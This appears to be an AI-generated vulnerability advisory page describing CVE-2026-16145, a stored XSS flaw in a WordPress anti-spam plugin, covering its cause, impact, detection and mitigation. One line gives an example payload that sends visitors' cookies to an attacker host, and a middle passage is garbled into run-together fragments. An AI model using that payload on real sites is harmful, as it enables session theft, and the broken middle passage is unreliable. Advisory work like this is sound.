
PEACH
Uma estrutura de isolamento de inquilino
CVE-2026-16145 is a Stored Cross-Site Scripting (XSS) vulnerability in the "Invisible Anti-Spam & CAPTCHA — reCAPTCHA Alternative for All Forms" WordPress plugin, affecting all versions up to and including 5.1. The flaw allows unauthenticated attackers to inject arbitrary web scripts via the action parameter, which are then stored and executed when any user visits an affected page. It was published on August 15, 2026, with Wordfence credited as the assigner. The vulnerability carries a CVSS v3.1 base score of 7.2 (High) (Wordfence, ENISA EUVD).
The root cause is insufficient input sanitization and output escaping of the action parameter (CWE-79: Improper Neutralization of Input During Web Page Generation). The plugin maintains an explicit-actions list — auto-populated at activation for common form builders — and any unauthenticated admin-ajax.php request whose action value matches an entry in this list can write a stored payload without passing any authentication gate. Vulnerable code paths have been identified in class-message-page.php (line 621), class-stamp.php (lines 136 and 771), and the issue was resolved in changeset 3633500 (Wordfence, WordPress Trac).
Successful exploitation allows unauthenticated attackers to persistently store malicious JavaScript in the WordPress database, which executes in the browsers of any user — including administrators — who visits an injected page. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement, or redirection to malicious sites. The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the vulnerable component to the browsers of site visitors (Wordfence, ENISA EUVD).
No active in-the-wild exploitation has been reported as of the publication date, and the NVD SSVC assessment lists exploitation as "none." The vulnerability is rated automatable ("yes") due to the lack of any authentication requirement, making it trivially scriptable at scale. The EPSS score is approximately 0.0027 (0.27%), indicating a low but non-negligible probability of exploitation in the near term. No CISA KEV catalog listing has been identified (Wordfence, ENISA EUVD).
gdpr-compliant-recaptcha-for-all-forms) version ≤ 5.1 using tools like WPScan, Shodan, or by checking /wp-content/plugins/gdpr-compliant-recaptcha-for-all-forms/ for a readable readme.txt.wp-admin/admin-ajax.php with an action parameter value matching a known entry in the plugin's explicit-actions list, embedding a JavaScript payload (e.g., action=<valid_action>&<param>=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).action value to the database.wp-admin/admin-ajax.php containing action parameter values matching known plugin action names, especially with HTML/script content in other parameters; outbound requests from victim browsers to unknown external domains shortly after page load.admin-ajax.php with suspicious action values; WordPress debug logs recording unexpected database writes from the plugin's stamp or message-page classes.<script> tags or encoded JavaScript payloads in the WordPress database within tables associated with the plugin's stored action data (inspect via wp_options or plugin-specific tables).Site administrators should update the "Invisible Anti-Spam & CAPTCHA — reCAPTCHA Alternative for All Forms" plugin to a version beyond 5.1, as the fix was introduced in changeset 3633500. If immediate update is not possible, consider temporarily deactivating the plugin to eliminate the attack surface. Additionally, a Web Application Firewall (WAF) rule blocking unauthenticated POST requests to admin-ajax.php with script-like content in the action parameter can serve as a short-term mitigation (Wordfence, WordPress Trac).
Wordfence included this vulnerability in their weekly WordPress vulnerability report for August 10–16, 2026, highlighting it as part of a broader set of plugin-level XSS issues discovered that week (Wordfence Blog). No significant independent researcher commentary or broader media coverage has been identified beyond standard vulnerability aggregator listings.
Origem: Este relatório foi gerado usando IA
Avaliação de vulnerabilidade gratuita
Avalie suas práticas de segurança na nuvem em 9 domínios de segurança para comparar seu nível de risco e identificar lacunas em suas defesas.
Marque uma demonstração personalizada
"A melhor experiência do usuário que eu já vi, fornece visibilidade total para cargas de trabalho na nuvem."
"A Wiz fornece um único painel de vidro para ver o que está acontecendo em nossos ambientes de nuvem."
"Sabemos que se a Wiz identifica algo como crítico, na verdade é."